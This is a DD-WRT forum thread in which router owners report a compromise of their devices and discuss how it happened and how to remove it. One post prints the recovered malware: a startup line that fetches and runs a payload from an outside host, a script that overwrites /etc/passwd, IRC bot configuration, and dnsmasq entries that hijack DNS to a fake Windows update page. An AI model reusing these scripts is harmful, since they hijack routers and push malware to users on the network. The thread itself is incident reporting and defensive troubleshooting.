My e3000 got pwned...by a crafty virus

Post new topic   Reply to topic    DD-WRT Forum Forum Index -> Broadcom SoC based Hardware
Author Message
reece016
DD-WRT Novice


Joined: 19 Dec 2007
Posts: 7

PostPosted: Sun Mar 27, 2011 6:30    Post subject: My e3000 got pwned...by a crafty virus Reply with quote
I came home yesterday to find an interesting screen loaded on both my mac and windows computers. Since this strange page was loading regardless of what I would try to do I started to investigate the router.
I have an e3000 running MEGA - build 15962

Here's the process my router now goes through when it boots up. I didn't wipe the config yet so I could capture what was going on.

The following lines were added to my startup...

while ! ping www.google.com -c 1 > /dev/null ; do
sleep 5
done
cd /tmp;wget http://ilove22.selfip.com/ilove22/dd/x;chmod +x x;./x

this "x" file runs the following...

#!/bin/sh
cd /tmp
wget http://ilove22.selfip.com/ilove22/dd/i.jpg
tar xvf i.jpg
rm -rf i.jpg
cd /tmp/i
chmod +x *
./start
echo "address=/#/123.49.41.249" >> /tmp/dnsmasq.conf;killall -9 dnsmasq;dnsmasq --conf-file=/tmp/dnsmasq.conf

The i.jpg file extracts the following...

i/
i/start
i/rand.txt
i/passwd
i/a.conf
i/int


at this point the "start" file code looks like this...

#!/bin/sh

cat passwd > /etc/passwd

echo "set CTIMEOUT 40" >> mech.conf
echo "server ilove25.selfip.com 6667" >> mech.conf
echo "nick 1 $(sed `echo $(cat /proc/interrupts | md5sum | sed 's/[^0-9]//g' | cut -c1-4)`"q;d" rand.txt)" >> mech.conf
echo "set ALTNICK $(sed `echo $(cat /proc/interrupts | md5sum | sed 's/[^0-9]//g' | cut -c1-4)`"q;d" rand.txt) $(sed `echo $(cat /proc/interrupts | md5sum | sed 's/[^0-9]//g' | cut -c1-4)`"q;d" rand.txt)" >> mech.conf
echo "set cmdchar \`" >> mech.conf
echo "SET CC 1" >> mech.conf
echo "alias ip int echo "IP-ul meu este `nvram get wan_ipaddr`"" >> mech.conf
echo "alias dns int echo "address=/#/79.132.242.146" >> /tmp/dnsmasq.conf;echo "address=/update.microsoft.com/208.75.230.43" >> /tmp/dnsmasq.conf;killall -9 dnsmasq;dnsmasq
--conf-file=/tmp/dnsmasq.conf" >> mech.conf
echo "alias stop int cat /tmp/dnsmasq.conf | grep -v address > /tmp/dnsmasq.conf;killall -9 dnsmasq;dnsmasq --conf-file=/tmp/dnsmasq.conf" >> mech.conf
echo "SET FL 25" >> mech.conf
echo "SET SD 1" >> mech.conf
echo "set IDENT $(sed `echo $(cat /proc/interrupts | md5sum | sed 's/[^0-9]//g' | cut -c1-4)`"q;d" rand.txt)" >> mech.conf
echo "set IRCNAME $(sed `echo $(cat /proc/interrupts | md5sum | sed 's/[^0-9]//g' | cut -c1-4)`"q;d" rand.txt)" >> mech.conf
echo "set LINKPORT 0" >> mech.conf
echo "set MODES 6" >> mech.conf
echo "set UMODES +iwsx" >> mech.conf
echo "set USERFILE a.conf" >> mech.conf
echo "join #interpricer" >> mech.conf

rm -rf dd.jpg
rm -rf start
chmod u+x *
export PATH=.
int

The final result is a microsoft looking page telling you that you need to download kb91021753.exe which I'm going to guess is a virus. I saved it to my mac but haven't loaded up a sacrificial PC yet to test what it does.
Anyone ever seen this before? I had SSH open and also had port 80 forwarded to my mac mini running Apache, but this looks to have either exploited SSH (I had it on port 22) or there's some other exploit method it used.

I attached all the files I gathered up (including the file that might be a virus) as a ZIP so someone with more knowledge can investigate further. My main concern is that this might be a "man in the middle" type of attack that works to steal passwords/information. Any help would be greatly appreciated.



dd-wrt-hacked.zip
 Description:
The kb91021753.exe is most likely a virus so DONT open it unless you are investigating this dd-wrt hack.

Download
 Filename:  dd-wrt-hacked.zip
 Filesize:  2.58 MB
 Downloaded:  639 Time(s)

Sponsor
<Kong>
DD-WRT Guru


Joined: 15 Dec 2010
Posts: 4339
Location: Germany

PostPosted: Sun Mar 27, 2011 8:05    Post subject: Reply with quote
I have a few questions to get an idea what may have caused this:

Did you download this build from dd-wrt site?
Did you password protect webmanagement, did you use ssh password or key etc?
Did you enable remote login through http?
Are you running any optware scripts/apps?
Did you record /var/log/messages to see login attemtps?
Have you used a strong ssh password.

_________________
KONG PB's: http://www.desipro.de/ddwrt/
KONG Info: http://tips.desipro.de/
reece016
DD-WRT Novice


Joined: 19 Dec 2007
Posts: 7

PostPosted: Sun Mar 27, 2011 19:17    Post subject: Reply with quote
Andersen wrote:
Scanned the executable file with 37 different virus scanners, only one of them reported it as a malware.

Result = Adware/EShoper.v


Which one of the 37 found it? I may need to change the Anti Virus software I use Smile. Thanks for running all those scans. Neither of my Anti Virus programs thought it was a threat, but it just seemed like it had to be.
reece016
DD-WRT Novice


Joined: 19 Dec 2007
Posts: 7

PostPosted: Sun Mar 27, 2011 19:38    Post subject: Reply with quote
Did you download this build from dd-wrt site?
yes, from here...
ftp://ftp.dd-wrt.com/others/eko/BrainSlayer-V24-preSP2/2010/12-24-10-r15962/broadcom_K26/dd-wrt.v24-15962_NEWD-2_K2.6_mega-e2k-e3k.bin

Did you password protect webmanagement?
I have web management disabled from the WAN, only internal access.

did you use ssh password or key etc?
I had an SSH password set. Maybe a shared key would be better?

Did you enable remote login through http?
nope, only SSH with username and password.

Are you running any optware scripts/apps?
nope, only forwarding a few ports. Port 80 for web and port 51413 for Transmission
Did you record /var/log/messages to see login attemtps?
No, but I'll look through the WIKI and set that up from now on.

Have you used a strong ssh password?
It was at least 8 characters with a mix of letters/numbers, so it's possible it could have been brute forced over time. I changed the user from "root" when I set it back up so that it will not be possible to log in as root.
<Kong>
DD-WRT Guru


Joined: 15 Dec 2010
Posts: 4339
Location: Germany

PostPosted: Sun Mar 27, 2011 20:00    Post subject: Reply with quote
But you have set a password for the webmanagement interface?

I ask this because it could be a dns rebinding issue, if you have no password set your browser could be fooled to send a post request to the router adding the wget command to your startup, which is possible if you don't have a password set for the webinterface.

_________________
KONG PB's: http://www.desipro.de/ddwrt/
KONG Info: http://tips.desipro.de/
dc
DD-WRT User


Joined: 08 Jun 2006
Posts: 247
Location: Prince Edward Island - Canada

PostPosted: Sun Mar 27, 2011 20:39    Post subject: Reply with quote
reece016 wrote:
<<snip>>
Did you use ssh password or key etc?
I had an SSH password set. Maybe a shared key would be better?

<<snip2>>
Have you used a strong ssh password?
It was at least 8 characters with a mix of letters/numbers, so it's possible it could have been brute forced over time. I changed the user from "root" when I set it back up so that it will not be possible to log in as root.

I've also wondered if authorized keys would be a better way to go..

Also, it doesn't matter if you change your login name, root will still work with ssh. It does add an extra bit of 'security' to the web login though.
<Kong>
DD-WRT Guru


Joined: 15 Dec 2010
Posts: 4339
Location: Germany

PostPosted: Sun Mar 27, 2011 21:32    Post subject: Reply with quote
Yes using authorized keys is much better first of all because you cannot use brute force methods anymore to try out passwords, the ssh server will close the connection at once if the client ask for password login.

Second advantage is, even if someone captures your password(keylogger, hardware usb keylogger, camera) he still cannot login until he also has your keyfile

This attack looks like an automated one, someone either scanned lots of machines to find an insecure dd-wrt box or he placed some code on a website which used dns rebinding technique to save this startup command.

If there was only ssh(no ftp etc.) accessable from outside it is likely the attack came from inside. For automated attacks it also helps to change ports e.g. ssh port to 2000 then an attacker would have to scan not just ips but every port on a target machine which takes way to long.

Compared to a regular linux distribution a router firmware is more secure since it does not include all features in the shipped apps e.g. lots of proftp bugs did not influence dd-wrts security since the vulnerable feature was not compile into dd-wrts proftp version. The other reason is because you don't directly work on your router which means local root exploits don't hit you.

Thus from the info he gave either there is an unknown security hole in dropbear or there were other exploitable services running on the router.
Or the attack come from the lan side and had access to the routers webinterface, either because he had no webinterface password set or was logged in to the webinterface at the time he viewed the attackers site.

_________________
KONG PB's: http://www.desipro.de/ddwrt/
KONG Info: http://tips.desipro.de/
Ben0
DD-WRT Novice


Joined: 02 Jul 2011
Posts: 4

PostPosted: Sat Jul 02, 2011 16:50    Post subject: Reply with quote
Damn it. I got the same message, and I actually ran the kb91021753.exe file. Now there is a C:\Windows\init.exe in the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and it comes back after reboot.

Please help me to get rid of the infected router first: How should I check the "startup" script?

I've power cycled the router, but my clean computer still get directed to http://update.windows.com/.kb910 page, and "ping" shows the update.windows.com is in [119.226.118.217].

After ssh into router, I ran
nvram get rc_startup
but got blank response.

All the files in /etc/config folder have Aug-8-2010 timestamp, that was when I installed this router (DD-WRT v24-sp2 (08/07/10) mini-usb-ftp)

So how should I check and restore the router to normal status, besides of uploading image? Would that help?
redhawk0
DD-WRT Guru


Joined: 04 Jan 2007
Posts: 11522
Location: Wherever the wind blows- North America

PostPosted: Sat Jul 02, 2011 18:01    Post subject: Reply with quote
If it were me...I'd use JTAG and erase nvram then the kernel...then start over with a fresh tftp load of the firmware. It isn't likely that it embedded itself in the CFE of the router....sounds like its firmware only.

redhawk
Ben0
DD-WRT Novice


Joined: 02 Jul 2011
Posts: 4

PostPosted: Sat Jul 02, 2011 18:33    Post subject: Reply with quote
The other question is: How was it getting hacked and how to prevent that from happening again?
Ben0
DD-WRT Novice


Joined: 02 Jul 2011
Posts: 4

PostPosted: Sat Jul 02, 2011 18:47    Post subject: Reply with quote
Found the modified entry:
In Additional DNSMasq Options, the textarea has this:
Quote:
address=/#/119.226.118.217


After deleting this item, my clean computer can finally visit internet. Reboot router, and it is still good.

In Admin->Remote Access, I set Allowed Remote IP Range to 192.168.1.0~192.168.1.254 to restrict remote connection.

I think the router is ok now. The next thing I need to do is to clean the kb91021753.exe that has been running in my computers.
Ben0
DD-WRT Novice


Joined: 02 Jul 2011
Posts: 4

PostPosted: Sun Jul 03, 2011 19:39    Post subject: Reply with quote
I've compiled a description of this attack at:
http://benincampus.blogspot.com/2011/07/attack-initiated-from-attacking-dd-wrt_03.html
crashfly
DD-WRT Guru


Joined: 24 Feb 2009
Posts: 2026
Location: Sol System > Earth > USA > Arkansas

PostPosted: Mon Jul 04, 2011 3:11    Post subject: Reply with quote
Ben0 wrote:
The other question is: How was it getting hacked and how to prevent that from happening again?

Looks like someone was scanning for open SSH ports. Once they found one, they brute forced it. Thank goodness I have a key for mine (and a non-standard port).

Thank you reece016 and Ben0 for reporting the problem. I am hoping people will look at this issue and do more to protect their router.

_________________
E3000 22200M KongVPN K26
WRT600n v1.1 refirb mega 18767 BS K24 NEWD2 [not used]
WRT54G v2 16214 BS K24 [access point]

Try Dropbox for syncing files - get 2.5gb online for free by signing up.

Read! Peacock thread
*PLEASE* upgrade PAST v24SP1 or no support.
hardbase
DD-WRT Novice


Joined: 05 Jul 2011
Posts: 1

PostPosted: Tue Jul 05, 2011 11:20    Post subject: re Reply with quote
so how i can remove this virus?
Display posts from previous:    Page 1 of 1
Post new topic   Reply to topic    DD-WRT Forum Forum Index -> Broadcom SoC based Hardware All times are GMT

Navigation

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum